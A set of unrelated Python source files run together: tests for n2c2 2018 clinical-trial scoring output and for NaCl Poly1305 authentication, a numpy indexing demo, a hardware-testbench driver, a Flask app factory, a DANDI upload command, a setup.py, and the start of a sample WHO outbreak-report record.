[ '203.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ASP-FOR-MI' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'CREATININE' , 'not met' , 'TP' ]
##
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ABDOMINAL' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ADVANCED-CAD' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ASP-FOR-MI' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'CREATININE' , 'met' , 'TP' ]
return score_card
def initialize_track1_score_card_with_errors():
score_card = scoring_metrics.new_score_card()
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ABDOMINAL' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ADVANCED-CAD' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'ASP-FOR-MI' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '103.xml' , -1 , -1 , 'CREATININE' , 'not met' , 'TP' ]
##
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ABDOMINAL' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ADVANCED-CAD' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'met' , 'FN' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'not met' , 'FP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'ASP-FOR-MI' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'CREATININE' , 'not met' , 'FN' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '203.xml' , -1 , -1 , 'CREATININE' , 'met' , 'FP' ]
##
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'DRUG-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ALCOHOL-ABUSE' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ENGLISH' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MAKES-DECISIONS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ABDOMINAL' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'met' , 'FN' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MAJOR-DIABETES' , 'not met' , 'FP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ADVANCED-CAD' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'MI-6MOS' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'KETO-1YR' , 'not met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'DIETSUPP-2MOS' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'ASP-FOR-MI' , 'met' , 'TP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'HBA1C' , 'not met' , 'FN' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'HBA1C' , 'met' , 'FP' ]
score_card[ 'exact' ].loc[ score_card[ 'exact' ].shape[ 0 ] ] = \
[ '303.xml' , -1 , -1 , 'CREATININE' , 'met' , 'TP' ]
return score_card
def initialize_for_track1():
command_line_args = [ '--reference-input' , 'tests/data/n2c2_2018_track-1_reference' ,
'--test-input' , 'tests/data/n2c2_2018_track-1_test' ,
'--empty-value' , '0.0' ]
args = args_and_configs.get_arguments( command_line_args )
    ## TODO - init_args normally handles this conversion; we duplicate it here to keep
    ## the test more portable, for now.
args.empty_value = float( args.empty_value )
file_mapping = { '103.xml': '103.xml' , '203.xml': '203.xml' , '303.xml': '303.xml' }
return( args , file_mapping )
#############################################
## Test print_score_summary()
#############################################
def test_perfect_track1_output( capsys ):
score_card = initialize_perfect_track1_score_card()
args , file_mapping = initialize_for_track1()
##
scoring_metrics.print_2018_n2c2_track1( score_card ,
file_mapping ,
args )
track1_out, err = capsys.readouterr()
track1_out = track1_out.strip()
##
expected_values = [
[ '*******************************************' , 'TRACK' , '1' , '********************************************' ] ,
[ '------------' , 'met' , '-------------' , '------' , 'not' , 'met' , '-------' , '--' , 'overall' , '---' ] ,
[ 'Prec.' , 'Rec.' , 'Speci.' , 'F(b=1)' , 'Prec.' , 'Rec.' , 'F(b=1)' , 'F(b=1)' , 'AUC' ] ,
[ 'Abdominal' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Advanced-cad' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Alcohol-abuse' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'Asp-for-mi' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Creatinine' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Dietsupp-2mos' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Drug-abuse' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'English' , 1.0000 , 1.0000 , 0.0000 , 1.0000 , 0.0000 , 0.0000 , 0.0000 , 0.5000 , 0.5000 ] ,
[ 'Hba1c' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'Keto-1yr' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'Major-diabetes' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Makes-decisions' , 1.0000 , 1.0000 , 0.0000 , 1.0000 , 0.0000 , 0.0000 , 0.0000 , 0.5000 , 0.5000 ] ,
[ 'Mi-6mos' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ '------------------------------' , '----------------------' , '--------------' ] ,
[ 'Overall' , '(micro)' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Overall' , '(macro)' , 0.6154 , 0.6154 , 0.8462 , 0.6154 , 0.8462 , 0.8462 , 0.8462 , 0.7308 , 0.7308 ] ,
[ '' ] ,
[ '3' , 'files' , 'found' ] ]
##
track1_values = []
for track1_line in track1_out.split( "\n" ):
track1_line = track1_line.strip()
track1_values.append( re.split( r' +' , track1_line ) )
for track1_line, expected_line in zip( track1_values , expected_values ):
for tmp_val, expected_val in zip( track1_line , expected_line ):
## The mixture of str and float values requires us to
## make a type check first...
if( isinstance( expected_val , str ) ):
assert tmp_val == expected_val
elif( expected_val is None or
tmp_val == 'None' ):
## ...if either are None, then both must be None
assert expected_val is None
assert tmp_val == 'None'
else:
                ## ...followed by a float conversion mapping to
## an approximate equality due to rounding differences
## between Py2 and Py3
assert float( tmp_val ) == approx( expected_val )
def test_track1_output_with_errors( capsys ):
score_card = initialize_track1_score_card_with_errors()
args , file_mapping = initialize_for_track1()
##
scoring_metrics.print_2018_n2c2_track1( score_card ,
file_mapping ,
args )
track1_out, err = capsys.readouterr()
track1_out = track1_out.strip()
##
expected_values = [
[ '*******************************************' , 'TRACK' , '1' , '********************************************' ] ,
[ '------------' , 'met' , '-------------' , '------' , 'not' , 'met' , '-------' , '--' , 'overall' , '---' ] ,
[ 'Prec.' , 'Rec.' , 'Speci.' , 'F(b=1)' , 'Prec.' , 'Rec.' , 'F(b=1)' , 'F(b=1)' , 'AUC' ] ,
[ 'Abdominal' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Advanced-cad' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Alcohol-abuse' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'Asp-for-mi' , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 , 1.0000 ] ,
[ 'Creatinine' , 0.5000 , 1.0000 , 0.5000 , 0.6667 , 1.0000 , 0.5000 , 0.6667 , 0.6667 , 0.7500 ] ,
[ 'Dietsupp-2mos' , 1.0000 , 0.5000 , 1.0000 , 0.6667 , 0.5000 , 1.0000 , 0.6667 , 0.6667 , 0.7500 ] ,
[ 'Drug-abuse' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'English' , 1.0000 , 1.0000 , 0.0000 , 1.0000 , 0.0000 , 0.0000 , 0.0000 , 0.5000 , 0.5000 ] ,
[ 'Hba1c' , 0.0000 , 0.0000 , 0.6667 , 0.0000 , 1.0000 , 0.6667 , 0.8000 , 0.4000 , 0.3333 ] ,
[ 'Keto-1yr' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ 'Major-diabetes' , 1.0000 , 0.5000 , 1.0000 , 0.6667 , 0.5000 , 1.0000 , 0.6667 , 0.6667 , 0.7500 ] ,
[ 'Makes-decisions' , 1.0000 , 1.0000 , 0.0000 , 1.0000 , 0.0000 , 0.0000 , 0.0000 , 0.5000 , 0.5000 ] ,
[ 'Mi-6mos' , 0.0000 , 0.0000 , 1.0000 , 0.0000 , 1.0000 , 1.0000 , 1.0000 , 0.5000 , 0.5000 ] ,
[ '------------------------------' , '----------------------' , '--------------' ] ,
[ 'Overall' , '(micro)' , 0.8750 , 0.8750 , 0.9130 , 0.8750 , 0.9130 , 0.9130 , 0.9130 , 0.8940 , 0.8940 ] ,
[ 'Overall' , '(macro)' , 0.5769 , 0.5385 , 0.7821 , 0.5385 , 0.7692 , 0.7821 , 0.7538 , 0.6462 , 0.6603 ] ,
[ '' ] ,
[ '3' , 'files' , 'found' ] ]
##
track1_values = []
for track1_line in track1_out.split( "\n" ):
track1_line = track1_line.strip()
track1_values.append( re.split( r' +' , track1_line ) )
for track1_line, expected_line in zip( track1_values , expected_values ):
for tmp_val, expected_val in zip( track1_line , expected_line ):
## The mixture of str and float values requires us to
## make a type check first...
if( isinstance( expected_val , str ) ):
assert tmp_val == expected_val
elif( expected_val is None or
tmp_val == 'None' ):
## ...if either are None, then both must be None
assert expected_val is None
assert tmp_val == 'None'
else:
                ## ...followed by a float conversion mapping to
## an approximate equality due to rounding differences
## between Py2 and Py3
assert float( tmp_val ) == approx( expected_val )
|
# 20140105
# Jan Mojzis
# Public domain.
import sys
import nacl.raw as nacl
from util import fromhex, flip_bit
def exc():
"""
"""
a, b, c = sys.exc_info()
return b
def onetimeauth_bad_test():
"""
"""
k = nacl.randombytes(nacl.crypto_onetimeauth_KEYBYTES)
m = nacl.randombytes(1)
a = nacl.crypto_onetimeauth(m, k)
#save exception string
exc_string = ""
ax = flip_bit(a)
try:
a = nacl.crypto_onetimeauth(ax, k)
except:
exc_string = exc()
bad = []
tmp = {"k":k, "m":m, "a":a}
tmp["k"] = nacl.randombytes(nacl.crypto_onetimeauth_KEYBYTES + 1)
bad.append(tmp)
tmp = {"k":k, "m":m, "a":a}
tmp["k"] = nacl.randombytes(nacl.crypto_onetimeauth_KEYBYTES - 1)
bad.append(tmp)
tmp = {"k":k, "m":m, "a":a}
tmp["k"] = 0
bad.append(tmp)
tmp = {"k":k, "m":m, "a":a}
tmp["m"] = 0
tmp["a"] = 0
bad.append(tmp)
for tmp in bad:
try:
nacl.crypto_onetimeauth(tmp["m"], tmp["k"])
except:
pass
else:
raise Exception("crypto_onetimeauth accepts incorrect input data")
try:
nacl.crypto_onetimeauth_open(tmp["a"], tmp["k"])
except:
if exc_string == exc():
raise
else:
raise Exception("crypto_onetimeauth_open accepts incorrect input data")
def onetimeauth_test():
"""
"""
    return  # NOTE: the long-message loop below is currently disabled by this early return
mlen = 0
while 1:
mlen = mlen + 1 + int(mlen / 16)
if mlen > 10000:
break
k = nacl.randombytes(nacl.crypto_onetimeauth_KEYBYTES)
m = nacl.randombytes(mlen)
a = nacl.crypto_onetimeauth(m, k)
nacl.crypto_onetimeauth_verify(a, m, k)
if mlen < 1:
continue
a1 = flip_bit(a)
try:
nacl.crypto_onetimeauth_verify(a1, m, k)
except:
pass
else:
raise ValueError("forgery")
def onetimeauth_constant_test():
"""
"""
x = nacl.crypto_onetimeauth
x = nacl.crypto_onetimeauth_verify
x = nacl.crypto_onetimeauth_BYTES
x = nacl.crypto_onetimeauth_IMPLEMENTATION
x = nacl.crypto_onetimeauth_KEYBYTES
x = nacl.crypto_onetimeauth_PRIMITIVE
x = nacl.crypto_onetimeauth_VERSION
def onetimeauth_poly1305_test():
"""
"""
k = "eea6a7251c1e72916d11c2cb214d3c252539121d8e234e652d651fa4c8cff880"
m = "8e993b9f48681273c29650ba32fc76ce48332ea7164d96a4476fb8c531a1186a"
m = m + "c0dfc17c98dce87b4da7f011ec48c97271d2c20f9b928fe2270d6fb863d51738"
m = m + "b48eeee314a7cc8ab932164548e526ae90224368517acfeabd6bb3732bc0e9da"
m = m + "99832b61ca01b6de56244a9e88d5f9b37973f622a43d14a6599b1f654cb45a74"
m = m + "e355a5"
r = "f3ffc7703f9400e52a7dfb4b3d3305d9"
a = nacl.crypto_onetimeauth(fromhex(m), fromhex(k))
if a != fromhex(r):
raise ValueError("invalid authenticator")
def onetimeauth_poly1305_test2():
"""
"""
k = "eea6a7251c1e72916d11c2cb214d3c252539121d8e234e652d651fa4c8cff880"
m = "8e993b9f48681273c29650ba32fc76ce48332ea7164d96a4476fb8c531a1186a"
m = m + "c0dfc17c98dce87b4da7f011ec48c97271d2c20f9b928fe2270d6fb863d51738"
m = m + "b48eeee314a7cc8ab932164548e526ae90224368517acfeabd6bb3732bc0e9da"
m = m + "99832b61ca01b6de56244a9e88d5f9b37973f622a43d14a6599b1f654cb45a74"
m = m + "e355a5"
a = "f3ffc7703f9400e52a7dfb4b3d3305d9"
nacl.crypto_onetimeauth_verify(fromhex(a), fromhex(m), fromhex(k))
def onetimeauth_poly1305_constant_test():
"""
"""
if nacl.crypto_onetimeauth_BYTES != 16:
raise ValueError("invalid crypto_onetimeauth_BYTES")
if nacl.crypto_onetimeauth_KEYBYTES != 32:
raise ValueError("invalid crypto_onetimeauth_KEYBYTES")
x = nacl.crypto_onetimeauth
x = nacl.crypto_onetimeauth_IMPLEMENTATION
x = nacl.crypto_onetimeauth_VERSION
x = nacl.crypto_onetimeauth_verify
def run():
"""
"""
onetimeauth_test()
onetimeauth_bad_test()
onetimeauth_constant_test()
onetimeauth_poly1305_test()
onetimeauth_poly1305_test2()
onetimeauth_poly1305_constant_test()
if __name__ == '__main__':
run()
|
import numpy as np
def print_matrix(data):
print('[')
for d2 in range(np.shape(data)[0]):
print(" ",list(data[d2]))
print(']')
def print_array(data):
print(" ".join(list(["%d" % i for i in data])))
x = np.array([[1,2,3],[4,5,6]])
print_matrix(x)
"""
x[0,:]
"""
print_array(x[0,:])
"""
x[1,1:]
"""
y = x[1,1:]
print_array(y)
"""
x[1,:2]
"""
x[1,:2] = 5
print_array(y)
print_matrix(x)
x = np.array([[1,2,3],[4,5,6]])
print_matrix(x)
"""
x[:,0]
"""
print_array(x[:,0])
"""
x[:,1]
"""
print_array(x[:,1])
x = np.array([[[1,2,3],[4,5,6]],[[11,12,13],[14,15,16]]])
#print_matrix(x)
"""
x[0,:] - not supported
Indexing is not supported when the number of indices differs from the number of dimensions.
print_matrix(x[0,:])
"""
"""
x[0,1,:]
"""
print_array(x[0,1,:])
|
import os,sys,random
import veri
NewName = os.path.expanduser('~')
sys.path.append('%s/vlsistuff/verification_libs3'%NewName)
import logs
Monitors=[]
cycles=0
GIVEUP_TIMEOUT = 10000 # how many cycles to run before giving up and retiring the test.
import encrypt_piped_efficiency
enc = encrypt_piped_efficiency.encrypt_piped_efficiency('tb.dut.',Monitors)
enc.run = enc.run_posedge_clk
import sequenceClass
seq = sequenceClass.sequenceClass('tb',Monitors,'',[])
def sequence(TestName):
Seq = logs.bin2string(TestName)
seq.readfile(Seq)
logs.setVar('sequence',Seq)
Dir = os.path.dirname(Seq)
logs.setVar('testsdir',Dir)
logs.log_info('SEQUENCE %d'%len(seq.Sequence))
def cannot_find_sig(Sig):
logs.log_error('cannot find "%s" signal in the design'%Sig)
KEY = '0x0123456789abcdef4455667788'
class driverMonitor(logs.driverClass):
def __init__(self,Path,Monitors):
logs.driverClass.__init__(self,Path,Monitors)
self.QUEUE = []
def run(self):
self.force('key',KEY)
vldin = int(random.randint(0,100)>75)
if vldin:
datain = random.randint(0,0xffffffff)
self.force('datain',datain)
self.QUEUE.append(datain)
else:
self.force('datain',0)
self.force('vldin',vldin)
if self.valid('vldout'):
dataout = self.peek('encrypted')
In = self.QUEUE.pop(0)
logs.log_info('IN %08x OUT %08x' % (In,dataout))
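# Note: self.QUEUE above acts as a simple in-order scoreboard -- every accepted datain is
# pushed, and each vldout pops the oldest entry so input N is logged next to output N.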
drv = driverMonitor('tb',Monitors)
def negedge():
global cycles
cycles += 1
veri.force('tb.cycles',str(cycles))
if (cycles>GIVEUP_TIMEOUT):
logs.log_info('finishing on default guard of %d'%GIVEUP_TIMEOUT)
enc.onFinish()
logs.closeLogs()
veri.finish()
rst_n = veri.peek('tb.rst_n')
if (rst_n!='1'):
return
if (cycles==30):
veri.listing('tb','100','deep.list')
if (cycles>30):
for Mon in Monitors: Mon.run()
def cucu():
veri.force('tb.datain','0')
veri.force('tb.key','0')
veri.force('tb.vldin','0')
encrypted = logs.peek('tb.encrypted')
vldout = logs.peek('tb.vldout')
|
"""
project.instance
Create and expose the Flask application
"""
from flask import Flask, render_template
def create_app():
application = Flask('app')
from app.project import config
application.config.from_object(config)
from app.project.database import db_init
application.db = db_init()
from app.project.routes import routes_init
routes_init(application)
return application
application = create_app()
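# Minimal way to serve the app above during development (a sketch; the project's real
# entry point may differ):
if __name__ == '__main__':
    application.run(debug=True)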
|
import click
from .base import (
devel_debug_option,
devel_option,
instance_option,
map_to_click_exceptions,
)
from ..consts import collection_drafts
@click.command()
# @dandiset_path_option(
# help="Top directory (local) of the dandiset. Files will be uploaded with "
# "paths relative to that directory. If not specified, current or a parent "
# "directory containing dandiset.yaml file will be assumed "
# )
@click.option(
"-e",
"--existing",
type=click.Choice(["error", "skip", "force", "overwrite", "refresh"]),
help="What to do if a file found existing on the server. 'skip' would skip"
"the file, 'force' - force reupload, 'overwrite' - force upload if "
"either size or modification time differs; 'refresh' - upload only if "
"local modification time is ahead of the remote.",
default="refresh",
show_default=True,
)
@click.option(
"--validation",
help="Data must pass validation before the upload. Use of this option is highly discouraged.",
type=click.Choice(["require", "skip", "ignore"]),
default="require",
show_default=True,
)
@click.argument("paths", nargs=-1) # , type=click.Path(exists=True, dir_okay=False))
# &
# Development options: Set DANDI_DEVEL for them to become available
#
# TODO: should always go to dandi for now
@instance_option()
# TODO: should always go into 'drafts' (consts.collection_drafts)
@devel_option(
"-c", "--girder-collection", help="For development: Girder collection to upload to"
)
# TODO: figure out folder for the dandiset
@devel_option("--girder-top-folder", help="For development: Girder top folder")
#
@devel_option(
"--fake-data",
help="For development: fake file content (filename will be stored instead of actual load)",
default=False,
is_flag=True,
)
@devel_option(
"--allow-any-path",
help="For development: allow DANDI 'unsupported' file types/paths",
default=False,
is_flag=True,
)
@devel_option(
"--upload-dandiset-metadata",
help="For development: do upload dandiset metadata",
default=False,
is_flag=True,
)
@devel_debug_option()
@map_to_click_exceptions
def upload(
paths,
existing="refresh",
validation="require",
dandiset_path=None,
# Development options should come as kwargs
girder_collection=collection_drafts,
girder_top_folder=None,
dandi_instance="dandi",
fake_data=False, # TODO: not implemented, prune?
allow_any_path=False,
upload_dandiset_metadata=False,
devel_debug=False,
):
"""Upload dandiset (files) to DANDI archive.
Target dandiset to upload to must already be registered in the archive and
locally "dandiset.yaml" should exist in `--dandiset-path`. If you have not
yet created a dandiset in the archive, use 'dandi register' command first.
    Local dandiset should pass validation. For that it should first be organized
    using the 'dandi organize' command.
By default all files in the dandiset (not following directories starting with a period)
will be considered for the upload. You can point to specific files you would like to
validate and have uploaded.
"""
from ..upload import upload
upload(
paths,
existing=existing,
validation=validation,
dandiset_path=dandiset_path,
girder_collection=girder_collection,
girder_top_folder=girder_top_folder,
dandi_instance=dandi_instance,
fake_data=fake_data,
allow_any_path=allow_any_path,
upload_dandiset_metadata=upload_dandiset_metadata,
devel_debug=devel_debug,
)
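# Example invocation (the path glob is illustrative):
#   dandi upload --existing refresh --validation require sub-01/*.nwb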
|
from distutils.core import setup
# setup
setup(title="pyblast", name="pyblast", version="1.0.0a", packages=["pyblast"])
|
sample_who_response = [{
"url": "https://www.who.int/csr/don/2005_08_31/en/",
"date_of_publication": "2005-08-31 xx:xx:xx",
"headline": "Yellow fever in Guinea",
"main_text": "WHO has received reports of 7 cases and 4 deaths from yellow fever in the region of Fouta Djalon. Four cases including 3 deaths have been reported in Mamou, a town of 236 000 inhabitants which grew around the railway line from Conakry to Kankan. Mamou acts as an important transport hub in the country. These cases have been laboratory confirmed by the WHO Collaborating Centre for Yellow Fever, the Institut Pasteur, Dakar, Senegal. In addition, 3 cases including 1 death have been reported from Dalaba, a city of 136,000 inhabitants, 50 km from Mamou.",
"reports": [{
"event_date": "2005-08-31 xx:xx:xx",
"diseases": ["yellow fever"],
"syndromes": [],
"locations": [{
"city": "Mamou",
"state": "Mamou Prefecture",
"country": "Guinea",
"continent": "Africa"
}, {
"city": "Dalaba",
"state": "Mamou Prefecture",
"country": "Guinea",
"continent": "Africa"
}]
}]
}, {
"url": "https://www.who.int/csr/don/2005_09_22/en/",
"date_of_publication": "2005-09-22 xx:xx:xx",
"headline": "Yellow fever in Burkina Faso and Côte d'Ivoire",
